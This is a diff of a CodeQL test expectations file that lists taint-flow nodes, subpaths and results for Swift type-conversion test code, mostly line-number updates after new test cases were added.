| +| conversions.swift:56:20:56:42 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | +| conversions.swift:56:20:56:44 | .utf8 | semmle.label | .utf8 | +| conversions.swift:58:13:58:32 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:59:13:59:13 | v | semmle.label | v | +| conversions.swift:62:18:62:50 | call to numericCast(_:) | semmle.label | call to numericCast(_:) | +| conversions.swift:62:30:62:49 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:63:12:63:12 | v2 | semmle.label | v2 | +| conversions.swift:65:17:65:66 | call to unsafeBitCast(_:to:) | semmle.label | call to unsafeBitCast(_:to:) | +| conversions.swift:65:31:65:50 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:66:12:66:12 | v4 | semmle.label | v4 | +| conversions.swift:74:11:74:35 | call to abs(_:) | semmle.label | call to abs(_:) | +| conversions.swift:74:15:74:34 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:75:12:75:12 | v7 | semmle.label | v7 | +| conversions.swift:90:12:90:50 | call to Self.init(_:radix:) [some:0] | semmle.label | call to Self.init(_:radix:) [some:0] | +| conversions.swift:90:12:90:51 | ...! | semmle.label | ...! | +| conversions.swift:90:16:90:38 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | +| conversions.swift:91:12:91:53 | call to Self.init(_:radix:) [some:0] | semmle.label | call to Self.init(_:radix:) [some:0] | +| conversions.swift:91:12:91:54 | ...! | semmle.label | ...! 
| +| conversions.swift:91:19:91:41 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | +| conversions.swift:93:12:93:50 | call to Self.init(littleEndian:) | semmle.label | call to Self.init(littleEndian:) | +| conversions.swift:93:30:93:49 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:94:12:94:56 | call to Self.init(littleEndian:) | semmle.label | call to Self.init(littleEndian:) | +| conversions.swift:94:33:94:55 | call to sourceUInt64(_:) | semmle.label | call to sourceUInt64(_:) | +| conversions.swift:95:12:95:47 | call to Self.init(bigEndian:) | semmle.label | call to Self.init(bigEndian:) | +| conversions.swift:95:27:95:46 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:96:12:96:53 | call to Self.init(bigEndian:) | semmle.label | call to Self.init(bigEndian:) | +| conversions.swift:96:30:96:52 | call to sourceUInt64(_:) | semmle.label | call to sourceUInt64(_:) | +| conversions.swift:97:12:97:31 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:97:12:97:33 | .littleEndian | semmle.label | .littleEndian | +| conversions.swift:98:12:98:34 | call to sourceUInt64(_:) | semmle.label | call to sourceUInt64(_:) | +| conversions.swift:98:12:98:36 | .littleEndian | semmle.label | .littleEndian | +| conversions.swift:99:12:99:31 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:99:12:99:33 | .bigEndian | semmle.label | .bigEndian | +| conversions.swift:100:12:100:34 | call to sourceUInt64(_:) | semmle.label | call to sourceUInt64(_:) | +| conversions.swift:100:12:100:36 | .bigEndian | semmle.label | .bigEndian | +| conversions.swift:136:12:136:33 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | +| conversions.swift:137:12:137:40 | call to Float.init(_:) | semmle.label | call to Float.init(_:) | +| conversions.swift:137:18:137:39 | call to sourceFloat(_:) | semmle.label | call to 
sourceFloat(_:) | +| conversions.swift:139:12:139:41 | call to String.init(_:) | semmle.label | call to String.init(_:) | +| conversions.swift:139:19:139:40 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | +| conversions.swift:140:12:140:41 | call to String.init(_:) | semmle.label | call to String.init(_:) | +| conversions.swift:140:12:140:43 | .utf8 | semmle.label | .utf8 | +| conversions.swift:140:19:140:40 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | +| conversions.swift:141:12:141:43 | call to String.init(_:) | semmle.label | call to String.init(_:) | +| conversions.swift:141:19:141:42 | call to sourceFloat80(_:) | semmle.label | call to sourceFloat80(_:) | +| conversions.swift:142:12:142:43 | call to String.init(_:) | semmle.label | call to String.init(_:) | +| conversions.swift:142:12:142:45 | .utf8 | semmle.label | .utf8 | +| conversions.swift:142:19:142:42 | call to sourceFloat80(_:) | semmle.label | call to sourceFloat80(_:) | +| conversions.swift:143:12:143:42 | call to String.init(_:) | semmle.label | call to String.init(_:) | +| conversions.swift:143:19:143:41 | call to sourceDouble(_:) | semmle.label | call to sourceDouble(_:) | +| conversions.swift:144:12:144:42 | call to String.init(_:) | semmle.label | call to String.init(_:) | +| conversions.swift:144:12:144:44 | .utf8 | semmle.label | .utf8 | +| conversions.swift:144:19:144:41 | call to sourceDouble(_:) | semmle.label | call to sourceDouble(_:) | +| conversions.swift:146:12:146:40 | call to Float.init(_:) | semmle.label | call to Float.init(_:) | +| conversions.swift:146:18:146:39 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | +| conversions.swift:147:12:147:79 | call to Float.init(sign:exponent:significand:) | semmle.label | call to Float.init(sign:exponent:significand:) | +| conversions.swift:147:41:147:60 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:148:12:148:79 | call to 
Float.init(sign:exponent:significand:) | semmle.label | call to Float.init(sign:exponent:significand:) | +| conversions.swift:148:57:148:78 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | +| conversions.swift:150:12:150:66 | call to Float.init(signOf:magnitudeOf:) | semmle.label | call to Float.init(signOf:magnitudeOf:) | +| conversions.swift:150:44:150:65 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | +| conversions.swift:152:12:152:33 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | +| conversions.swift:152:12:152:35 | .exponent | semmle.label | .exponent | +| conversions.swift:153:12:153:33 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | +| conversions.swift:153:12:153:35 | .significand | semmle.label | .significand | +| conversions.swift:154:12:154:35 | call to sourceFloat80(_:) | semmle.label | call to sourceFloat80(_:) | +| conversions.swift:154:12:154:37 | .exponent | semmle.label | .exponent | +| conversions.swift:155:12:155:35 | call to sourceFloat80(_:) | semmle.label | call to sourceFloat80(_:) | +| conversions.swift:155:12:155:37 | .significand | semmle.label | .significand | +| conversions.swift:156:12:156:34 | call to sourceDouble(_:) | semmle.label | call to sourceDouble(_:) | +| conversions.swift:156:12:156:36 | .exponent | semmle.label | .exponent | +| conversions.swift:157:12:157:34 | call to sourceDouble(_:) | semmle.label | call to sourceDouble(_:) | +| conversions.swift:157:12:157:36 | .significand | semmle.label | .significand | +| conversions.swift:165:12:165:35 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | +| conversions.swift:166:12:166:43 | call to String.init(_:) | semmle.label | call to String.init(_:) | +| conversions.swift:166:19:166:42 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | +| conversions.swift:174:12:174:45 | call to MyString.init(_:) | semmle.label | call to MyString.init(_:) | +| 
conversions.swift:174:12:174:45 | call to MyString.init(_:) [some:0] | semmle.label | call to MyString.init(_:) [some:0] | +| conversions.swift:174:12:174:46 | ...! | semmle.label | ...! | +| conversions.swift:174:21:174:44 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | +| conversions.swift:175:12:175:12 | ms2 | semmle.label | ms2 | +| conversions.swift:176:12:176:16 | .description | semmle.label | .description | +| conversions.swift:177:12:177:16 | .debugDescription | semmle.label | .debugDescription | +| conversions.swift:182:31:182:54 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | +| conversions.swift:183:12:183:12 | parent | semmle.label | parent | +| conversions.swift:184:12:184:12 | parent | semmle.label | parent | +| conversions.swift:186:25:186:69 | call to unsafeDowncast(_:to:) | semmle.label | call to unsafeDowncast(_:to:) | +| conversions.swift:186:40:186:40 | parent | semmle.label | parent | +| conversions.swift:187:12:187:12 | v3 | semmle.label | v3 | +| conversions.swift:188:12:188:12 | v3 | semmle.label | v3 | +| conversions.swift:201:14:201:33 | call to sourceArray(_:) | semmle.label | call to sourceArray(_:) | +| conversions.swift:202:14:202:33 | [...] [Collection element] | semmle.label | [...] [Collection element] | +| conversions.swift:202:15:202:32 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:203:13:203:13 | arr1 | semmle.label | arr1 | +| conversions.swift:204:13:204:13 | arr2 | semmle.label | arr2 | +| conversions.swift:205:13:205:19 | ...[...] | semmle.label | ...[...] | +| conversions.swift:206:13:206:13 | arr2 [Collection element] | semmle.label | arr2 [Collection element] | +| conversions.swift:206:13:206:19 | ...[...] | semmle.label | ...[...] 
| +| conversions.swift:208:19:208:29 | call to Array.init(_:) [Collection element] | semmle.label | call to Array.init(_:) [Collection element] | +| conversions.swift:208:25:208:25 | arr1 | semmle.label | arr1 | +| conversions.swift:209:19:209:29 | call to Array.init(_:) [Collection element] | semmle.label | call to Array.init(_:) [Collection element] | +| conversions.swift:209:25:209:25 | arr2 [Collection element] | semmle.label | arr2 [Collection element] | +| conversions.swift:210:13:210:13 | arr1b | semmle.label | arr1b | +| conversions.swift:211:13:211:13 | arr2b | semmle.label | arr2b | +| conversions.swift:212:13:212:13 | arr1b [Collection element] | semmle.label | arr1b [Collection element] | +| conversions.swift:212:13:212:20 | ...[...] | semmle.label | ...[...] | +| conversions.swift:213:13:213:13 | arr2b [Collection element] | semmle.label | arr2b [Collection element] | +| conversions.swift:213:13:213:20 | ...[...] | semmle.label | ...[...] | +| conversions.swift:215:15:215:35 | call to ContiguousArray.init(_:) [Collection element] | semmle.label | call to ContiguousArray.init(_:) [Collection element] | +| conversions.swift:215:31:215:31 | arr1 | semmle.label | arr1 | +| conversions.swift:216:15:216:35 | call to ContiguousArray.init(_:) [Collection element] | semmle.label | call to ContiguousArray.init(_:) [Collection element] | +| conversions.swift:216:31:216:31 | arr2 [Collection element] | semmle.label | arr2 [Collection element] | +| conversions.swift:217:13:217:13 | arr1c | semmle.label | arr1c | +| conversions.swift:218:13:218:13 | arr2c | semmle.label | arr2c | +| conversions.swift:219:13:219:13 | arr1c [Collection element] | semmle.label | arr1c [Collection element] | +| conversions.swift:219:13:219:20 | ...[...] | semmle.label | ...[...] | +| conversions.swift:220:13:220:13 | arr2c [Collection element] | semmle.label | arr2c [Collection element] | +| conversions.swift:220:13:220:20 | ...[...] | semmle.label | ...[...] 
| +| conversions.swift:227:6:227:6 | self [v] | semmle.label | self [v] | +| conversions.swift:229:2:231:2 | self[return] [v] | semmle.label | self[return] [v] | +| conversions.swift:229:7:229:12 | v | semmle.label | v | +| conversions.swift:230:3:230:3 | [post] self [v] | semmle.label | [post] self [v] | +| conversions.swift:230:12:230:12 | v | semmle.label | v | +| conversions.swift:235:7:235:17 | withUInt | semmle.label | withUInt | +| conversions.swift:236:13:236:13 | withUInt | semmle.label | withUInt | +| conversions.swift:241:7:241:20 | withMyValue [v] | semmle.label | withMyValue [v] | +| conversions.swift:242:13:242:13 | withMyValue [v] | semmle.label | withMyValue [v] | +| conversions.swift:242:13:242:25 | .v | semmle.label | .v | +| conversions.swift:247:2:252:2 | self[return] | semmle.label | self[return] | +| conversions.swift:247:7:247:21 | withMyValue2 [v] | semmle.label | withMyValue2 [v] | +| conversions.swift:248:13:248:13 | withMyValue2 [v] | semmle.label | withMyValue2 [v] | +| conversions.swift:248:13:248:26 | .v | semmle.label | .v | +| conversions.swift:249:11:249:11 | withMyValue2 [v] | semmle.label | withMyValue2 [v] | +| conversions.swift:249:11:249:24 | .v | semmle.label | .v | +| conversions.swift:251:12:251:12 | self | semmle.label | self | +| conversions.swift:254:20:254:33 | withMyValue [v] | semmle.label | withMyValue [v] | +| conversions.swift:255:13:255:13 | withMyValue [v] | semmle.label | withMyValue [v] | +| conversions.swift:255:13:255:25 | .v | semmle.label | .v | +| conversions.swift:256:10:256:10 | withMyValue [v] | semmle.label | withMyValue [v] | +| conversions.swift:256:10:256:22 | .v | semmle.label | .v | +| conversions.swift:262:26:262:43 | call to sourceUInt(_:) | semmle.label | call to sourceUInt(_:) | +| conversions.swift:265:29:265:54 | call to MyValue.init(_:) [v] | semmle.label | call to MyValue.init(_:) [v] | +| conversions.swift:265:37:265:53 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| 
conversions.swift:268:12:268:56 | call to Int.init(withMyValue2:) | semmle.label | call to Int.init(withMyValue2:) | +| conversions.swift:268:30:268:55 | call to MyValue.init(_:) [v] | semmle.label | call to MyValue.init(_:) [v] | +| conversions.swift:268:38:268:54 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:271:12:271:61 | call to mkInt(withMyValue:) | semmle.label | call to mkInt(withMyValue:) | +| conversions.swift:271:35:271:60 | call to MyValue.init(_:) [v] | semmle.label | call to MyValue.init(_:) [v] | +| conversions.swift:271:43:271:59 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | | file://:0:0:0:0 | .first | semmle.label | .first | | file://:0:0:0:0 | .second | semmle.label | .second | | file://:0:0:0:0 | .v | semmle.label | .v | 
@@ -495,16 +515,16 @@ nodes | try.swift:18:18:18:25 | call to source() | semmle.label | call to source() | | try.swift:18:18:18:25 | call to source() [some:0] | semmle.label | call to source() [some:0] | subpaths -| conversions.swift:212:13:212:13 | withMyValue [v] | conversions.swift:197:6:197:6 | self [v] | file://:0:0:0:0 | .v | conversions.swift:212:13:212:25 | .v | -| conversions.swift:218:13:218:13 | withMyValue2 [v] | conversions.swift:197:6:197:6 | self [v] | file://:0:0:0:0 | .v | conversions.swift:218:13:218:26 | .v | -| conversions.swift:219:11:219:11 | withMyValue2 [v] | conversions.swift:197:6:197:6 | self [v] | file://:0:0:0:0 | .v | conversions.swift:219:11:219:24 | .v | -| conversions.swift:225:13:225:13 | withMyValue [v] | conversions.swift:197:6:197:6 | self [v] | file://:0:0:0:0 | .v | conversions.swift:225:13:225:25 | .v | -| conversions.swift:226:10:226:10 | withMyValue [v] | conversions.swift:197:6:197:6 | self [v] | file://:0:0:0:0 | .v | conversions.swift:226:10:226:22 | .v | -| conversions.swift:235:37:235:53 | call to sourceInt(_:) | conversions.swift:199:7:199:12 | v | conversions.swift:199:2:201:2 | self[return] [v] | conversions.swift:235:29:235:54 | call to MyValue.init(_:) [v] | -| conversions.swift:238:30:238:55 | call to MyValue.init(_:) [v] | conversions.swift:217:7:217:21 | withMyValue2 [v] | conversions.swift:217:2:222:2 | self[return] | conversions.swift:238:12:238:56 | call to Int.init(withMyValue2:) | -| conversions.swift:238:38:238:54 | call to sourceInt(_:) | conversions.swift:199:7:199:12 | v | conversions.swift:199:2:201:2 | self[return] [v] | conversions.swift:238:30:238:55 | call to MyValue.init(_:) [v] | -| conversions.swift:241:35:241:60 | call to MyValue.init(_:) [v] | conversions.swift:224:20:224:33 | withMyValue [v] | conversions.swift:226:10:226:22 | .v | conversions.swift:241:12:241:61 | call to mkInt(withMyValue:) | -| conversions.swift:241:43:241:59 | call to sourceInt(_:) | conversions.swift:199:7:199:12 | v | 
conversions.swift:199:2:201:2 | self[return] [v] | conversions.swift:241:35:241:60 | call to MyValue.init(_:) [v] | +| conversions.swift:242:13:242:13 | withMyValue [v] | conversions.swift:227:6:227:6 | self [v] | file://:0:0:0:0 | .v | conversions.swift:242:13:242:25 | .v | +| conversions.swift:248:13:248:13 | withMyValue2 [v] | conversions.swift:227:6:227:6 | self [v] | file://:0:0:0:0 | .v | conversions.swift:248:13:248:26 | .v | +| conversions.swift:249:11:249:11 | withMyValue2 [v] | conversions.swift:227:6:227:6 | self [v] | file://:0:0:0:0 | .v | conversions.swift:249:11:249:24 | .v | +| conversions.swift:255:13:255:13 | withMyValue [v] | conversions.swift:227:6:227:6 | self [v] | file://:0:0:0:0 | .v | conversions.swift:255:13:255:25 | .v | +| conversions.swift:256:10:256:10 | withMyValue [v] | conversions.swift:227:6:227:6 | self [v] | file://:0:0:0:0 | .v | conversions.swift:256:10:256:22 | .v | +| conversions.swift:265:37:265:53 | call to sourceInt(_:) | conversions.swift:229:7:229:12 | v | conversions.swift:229:2:231:2 | self[return] [v] | conversions.swift:265:29:265:54 | call to MyValue.init(_:) [v] | +| conversions.swift:268:30:268:55 | call to MyValue.init(_:) [v] | conversions.swift:247:7:247:21 | withMyValue2 [v] | conversions.swift:247:2:252:2 | self[return] | conversions.swift:268:12:268:56 | call to Int.init(withMyValue2:) | +| conversions.swift:268:38:268:54 | call to sourceInt(_:) | conversions.swift:229:7:229:12 | v | conversions.swift:229:2:231:2 | self[return] [v] | conversions.swift:268:30:268:55 | call to MyValue.init(_:) [v] | +| conversions.swift:271:35:271:60 | call to MyValue.init(_:) [v] | conversions.swift:254:20:254:33 | withMyValue [v] | conversions.swift:256:10:256:22 | .v | conversions.swift:271:12:271:61 | call to mkInt(withMyValue:) | +| conversions.swift:271:43:271:59 | call to sourceInt(_:) | conversions.swift:229:7:229:12 | v | conversions.swift:229:2:231:2 | self[return] [v] | conversions.swift:271:35:271:60 | call to 
MyValue.init(_:) [v] | | stringinterpolation.swift:13:36:13:36 | pair [first] | stringinterpolation.swift:6:6:6:6 | self [first] | file://:0:0:0:0 | .first | stringinterpolation.swift:13:36:13:41 | .first | | stringinterpolation.swift:19:13:19:20 | call to source() | stringinterpolation.swift:6:6:6:6 | value | stringinterpolation.swift:6:6:6:6 | self [Return] [first] | stringinterpolation.swift:19:2:19:2 | [post] p1 [first] | | stringinterpolation.swift:22:21:22:21 | p1 [first] | stringinterpolation.swift:6:6:6:6 | self [first] | file://:0:0:0:0 | .first | stringinterpolation.swift:22:21:22:24 | .first | 
@@ -514,70 +534,76 @@ subpaths | stringinterpolation.swift:31:21:31:21 | p2 [second] | stringinterpolation.swift:7:6:7:6 | self [second] | file://:0:0:0:0 | .second | stringinterpolation.swift:31:21:31:24 | .second | #select | conversions.swift:32:12:32:31 | call to sourceInt(_:) | conversions.swift:32:12:32:31 | call to sourceInt(_:) | conversions.swift:32:12:32:31 | call to sourceInt(_:) | result | -| conversions.swift:35:12:35:38 | call to Float.init(_:) | conversions.swift:35:18:35:37 | call to sourceInt(_:) | conversions.swift:35:12:35:38 | call to Float.init(_:) | result | -| conversions.swift:36:12:36:39 | call to String.init(_:) | conversions.swift:36:19:36:38 | call to sourceInt(_:) | conversions.swift:36:12:36:39 | call to String.init(_:) | result | -| conversions.swift:37:12:37:41 | .utf8 | conversions.swift:37:19:37:38 | call to sourceInt(_:) | conversions.swift:37:12:37:41 | .utf8 | result | -| conversions.swift:40:12:40:12 | arr | conversions.swift:39:19:39:38 | call to sourceInt(_:) | conversions.swift:40:12:40:12 | arr | result | -| conversions.swift:41:12:41:17 | ...[...] | conversions.swift:39:19:39:38 | call to sourceInt(_:) | conversions.swift:41:12:41:17 | ...[...] | result | -| conversions.swift:42:12:42:23 | call to Array.init(_:) | conversions.swift:39:19:39:38 | call to sourceInt(_:) | conversions.swift:42:12:42:23 | call to Array.init(_:) | result | -| conversions.swift:43:12:43:26 | ...[...] | conversions.swift:39:19:39:38 | call to sourceInt(_:) | conversions.swift:43:12:43:26 | ...[...] | result | -| conversions.swift:44:12:44:48 | call to Array.init(_:) | conversions.swift:44:20:44:42 | call to sourceString(_:) | conversions.swift:44:12:44:48 | call to Array.init(_:) | result | -| conversions.swift:45:12:45:51 | ...[...] | conversions.swift:45:20:45:42 | call to sourceString(_:) | conversions.swift:45:12:45:51 | ...[...] 
| result | -| conversions.swift:48:13:48:13 | v | conversions.swift:47:13:47:32 | call to sourceInt(_:) | conversions.swift:48:13:48:13 | v | result | -| conversions.swift:52:12:52:12 | v2 | conversions.swift:51:30:51:49 | call to sourceInt(_:) | conversions.swift:52:12:52:12 | v2 | result | -| conversions.swift:55:12:55:12 | v4 | conversions.swift:54:31:54:50 | call to sourceInt(_:) | conversions.swift:55:12:55:12 | v4 | result | -| conversions.swift:64:12:64:12 | v7 | conversions.swift:63:15:63:34 | call to sourceInt(_:) | conversions.swift:64:12:64:12 | v7 | result | -| conversions.swift:75:12:75:51 | ...! | conversions.swift:75:16:75:38 | call to sourceString(_:) | conversions.swift:75:12:75:51 | ...! | result | -| conversions.swift:77:12:77:50 | call to Self.init(littleEndian:) | conversions.swift:77:30:77:49 | call to sourceInt(_:) | conversions.swift:77:12:77:50 | call to Self.init(littleEndian:) | result | -| conversions.swift:78:12:78:47 | call to Self.init(bigEndian:) | conversions.swift:78:27:78:46 | call to sourceInt(_:) | conversions.swift:78:12:78:47 | call to Self.init(bigEndian:) | result | -| conversions.swift:79:12:79:33 | .littleEndian | conversions.swift:79:12:79:31 | call to sourceInt(_:) | conversions.swift:79:12:79:33 | .littleEndian | result | -| conversions.swift:80:12:80:33 | .bigEndian | conversions.swift:80:12:80:31 | call to sourceInt(_:) | conversions.swift:80:12:80:33 | .bigEndian | result | -| conversions.swift:108:12:108:33 | call to sourceFloat(_:) | conversions.swift:108:12:108:33 | call to sourceFloat(_:) | conversions.swift:108:12:108:33 | call to sourceFloat(_:) | result | -| conversions.swift:109:12:109:40 | call to Float.init(_:) | conversions.swift:109:18:109:39 | call to sourceFloat(_:) | conversions.swift:109:12:109:40 | call to Float.init(_:) | result | -| conversions.swift:111:12:111:41 | call to String.init(_:) | conversions.swift:111:19:111:40 | call to sourceFloat(_:) | conversions.swift:111:12:111:41 | call to 
String.init(_:) | result | -| conversions.swift:112:12:112:43 | .utf8 | conversions.swift:112:19:112:40 | call to sourceFloat(_:) | conversions.swift:112:12:112:43 | .utf8 | result | -| conversions.swift:113:12:113:43 | call to String.init(_:) | conversions.swift:113:19:113:42 | call to sourceFloat80(_:) | conversions.swift:113:12:113:43 | call to String.init(_:) | result | -| conversions.swift:114:12:114:45 | .utf8 | conversions.swift:114:19:114:42 | call to sourceFloat80(_:) | conversions.swift:114:12:114:45 | .utf8 | result | -| conversions.swift:115:12:115:42 | call to String.init(_:) | conversions.swift:115:19:115:41 | call to sourceDouble(_:) | conversions.swift:115:12:115:42 | call to String.init(_:) | result | -| conversions.swift:116:12:116:44 | .utf8 | conversions.swift:116:19:116:41 | call to sourceDouble(_:) | conversions.swift:116:12:116:44 | .utf8 | result | -| conversions.swift:118:12:118:40 | call to Float.init(_:) | conversions.swift:118:18:118:39 | call to sourceFloat(_:) | conversions.swift:118:12:118:40 | call to Float.init(_:) | result | -| conversions.swift:119:12:119:79 | call to Float.init(sign:exponent:significand:) | conversions.swift:119:41:119:60 | call to sourceInt(_:) | conversions.swift:119:12:119:79 | call to Float.init(sign:exponent:significand:) | result | -| conversions.swift:120:12:120:79 | call to Float.init(sign:exponent:significand:) | conversions.swift:120:57:120:78 | call to sourceFloat(_:) | conversions.swift:120:12:120:79 | call to Float.init(sign:exponent:significand:) | result | -| conversions.swift:122:12:122:66 | call to Float.init(signOf:magnitudeOf:) | conversions.swift:122:44:122:65 | call to sourceFloat(_:) | conversions.swift:122:12:122:66 | call to Float.init(signOf:magnitudeOf:) | result | -| conversions.swift:124:12:124:35 | .exponent | conversions.swift:124:12:124:33 | call to sourceFloat(_:) | conversions.swift:124:12:124:35 | .exponent | result | -| conversions.swift:125:12:125:35 | .significand | 
conversions.swift:125:12:125:33 | call to sourceFloat(_:) | conversions.swift:125:12:125:35 | .significand | result | -| conversions.swift:126:12:126:37 | .exponent | conversions.swift:126:12:126:35 | call to sourceFloat80(_:) | conversions.swift:126:12:126:37 | .exponent | result | -| conversions.swift:127:12:127:37 | .significand | conversions.swift:127:12:127:35 | call to sourceFloat80(_:) | conversions.swift:127:12:127:37 | .significand | result | -| conversions.swift:128:12:128:36 | .exponent | conversions.swift:128:12:128:34 | call to sourceDouble(_:) | conversions.swift:128:12:128:36 | .exponent | result | -| conversions.swift:129:12:129:36 | .significand | conversions.swift:129:12:129:34 | call to sourceDouble(_:) | conversions.swift:129:12:129:36 | .significand | result | -| conversions.swift:135:12:135:35 | call to sourceString(_:) | conversions.swift:135:12:135:35 | call to sourceString(_:) | conversions.swift:135:12:135:35 | call to sourceString(_:) | result | -| conversions.swift:136:12:136:43 | call to String.init(_:) | conversions.swift:136:19:136:42 | call to sourceString(_:) | conversions.swift:136:12:136:43 | call to String.init(_:) | result | -| conversions.swift:145:12:145:12 | ms2 | conversions.swift:144:21:144:44 | call to sourceString(_:) | conversions.swift:145:12:145:12 | ms2 | result | -| conversions.swift:146:12:146:16 | .description | conversions.swift:144:21:144:44 | call to sourceString(_:) | conversions.swift:146:12:146:16 | .description | result | -| conversions.swift:147:12:147:16 | .debugDescription | conversions.swift:144:21:144:44 | call to sourceString(_:) | conversions.swift:147:12:147:16 | .debugDescription | result | -| conversions.swift:153:12:153:12 | parent | conversions.swift:152:31:152:54 | call to sourceString(_:) | conversions.swift:153:12:153:12 | parent | result | -| conversions.swift:154:12:154:12 | parent | conversions.swift:152:31:152:54 | call to sourceString(_:) | conversions.swift:154:12:154:12 | parent | 
result | -| conversions.swift:157:12:157:12 | v3 | conversions.swift:152:31:152:54 | call to sourceString(_:) | conversions.swift:157:12:157:12 | v3 | result | -| conversions.swift:158:12:158:12 | v3 | conversions.swift:152:31:152:54 | call to sourceString(_:) | conversions.swift:158:12:158:12 | v3 | result | -| conversions.swift:173:13:173:13 | arr1 | conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:173:13:173:13 | arr1 | result | -| conversions.swift:174:13:174:13 | arr2 | conversions.swift:172:15:172:32 | call to sourceInt(_:) | conversions.swift:174:13:174:13 | arr2 | result | -| conversions.swift:175:13:175:19 | ...[...] | conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:175:13:175:19 | ...[...] | result | -| conversions.swift:176:13:176:19 | ...[...] | conversions.swift:172:15:172:32 | call to sourceInt(_:) | conversions.swift:176:13:176:19 | ...[...] | result | -| conversions.swift:180:13:180:13 | arr1b | conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:180:13:180:13 | arr1b | result | -| conversions.swift:181:13:181:13 | arr2b | conversions.swift:172:15:172:32 | call to sourceInt(_:) | conversions.swift:181:13:181:13 | arr2b | result | -| conversions.swift:182:13:182:20 | ...[...] | conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:182:13:182:20 | ...[...] | result | -| conversions.swift:183:13:183:20 | ...[...] | conversions.swift:172:15:172:32 | call to sourceInt(_:) | conversions.swift:183:13:183:20 | ...[...] | result | -| conversions.swift:187:13:187:13 | arr1c | conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:187:13:187:13 | arr1c | result | -| conversions.swift:188:13:188:13 | arr2c | conversions.swift:172:15:172:32 | call to sourceInt(_:) | conversions.swift:188:13:188:13 | arr2c | result | -| conversions.swift:189:13:189:20 | ...[...] 
| conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:189:13:189:20 | ...[...] | result | -| conversions.swift:190:13:190:20 | ...[...] | conversions.swift:172:15:172:32 | call to sourceInt(_:) | conversions.swift:190:13:190:20 | ...[...] | result | -| conversions.swift:206:13:206:13 | withUInt | conversions.swift:232:26:232:43 | call to sourceUInt(_:) | conversions.swift:206:13:206:13 | withUInt | result | -| conversions.swift:212:13:212:25 | .v | conversions.swift:235:37:235:53 | call to sourceInt(_:) | conversions.swift:212:13:212:25 | .v | result | -| conversions.swift:218:13:218:26 | .v | conversions.swift:238:38:238:54 | call to sourceInt(_:) | conversions.swift:218:13:218:26 | .v | result | -| conversions.swift:221:12:221:12 | self | conversions.swift:238:38:238:54 | call to sourceInt(_:) | conversions.swift:221:12:221:12 | self | result | -| conversions.swift:225:13:225:25 | .v | conversions.swift:241:43:241:59 | call to sourceInt(_:) | conversions.swift:225:13:225:25 | .v | result | -| conversions.swift:238:12:238:56 | call to Int.init(withMyValue2:) | conversions.swift:238:38:238:54 | call to sourceInt(_:) | conversions.swift:238:12:238:56 | call to Int.init(withMyValue2:) | result | -| conversions.swift:241:12:241:61 | call to mkInt(withMyValue:) | conversions.swift:241:43:241:59 | call to sourceInt(_:) | conversions.swift:241:12:241:61 | call to mkInt(withMyValue:) | result | +| conversions.swift:45:12:45:39 | call to Float.init(_:) | conversions.swift:45:18:45:38 | call to sourceInt(_:) | conversions.swift:45:12:45:39 | call to Float.init(_:) | result | +| conversions.swift:46:12:46:40 | call to Double.init(_:) | conversions.swift:46:19:46:39 | call to sourceInt(_:) | conversions.swift:46:12:46:40 | call to Double.init(_:) | result | +| conversions.swift:47:12:47:40 | call to String.init(_:) | conversions.swift:47:19:47:39 | call to sourceInt(_:) | conversions.swift:47:12:47:40 | call to String.init(_:) | result | +| 
conversions.swift:48:12:48:42 | .utf8 | conversions.swift:48:19:48:39 | call to sourceInt(_:) | conversions.swift:48:12:48:42 | .utf8 | result | +| conversions.swift:51:12:51:12 | arr | conversions.swift:50:19:50:38 | call to sourceInt(_:) | conversions.swift:51:12:51:12 | arr | result | +| conversions.swift:52:12:52:17 | ...[...] | conversions.swift:50:19:50:38 | call to sourceInt(_:) | conversions.swift:52:12:52:17 | ...[...] | result | +| conversions.swift:53:12:53:23 | call to Array.init(_:) | conversions.swift:50:19:50:38 | call to sourceInt(_:) | conversions.swift:53:12:53:23 | call to Array.init(_:) | result | +| conversions.swift:54:12:54:26 | ...[...] | conversions.swift:50:19:50:38 | call to sourceInt(_:) | conversions.swift:54:12:54:26 | ...[...] | result | +| conversions.swift:55:12:55:48 | call to Array.init(_:) | conversions.swift:55:20:55:42 | call to sourceString(_:) | conversions.swift:55:12:55:48 | call to Array.init(_:) | result | +| conversions.swift:56:12:56:51 | ...[...] | conversions.swift:56:20:56:42 | call to sourceString(_:) | conversions.swift:56:12:56:51 | ...[...] | result | +| conversions.swift:59:13:59:13 | v | conversions.swift:58:13:58:32 | call to sourceInt(_:) | conversions.swift:59:13:59:13 | v | result | +| 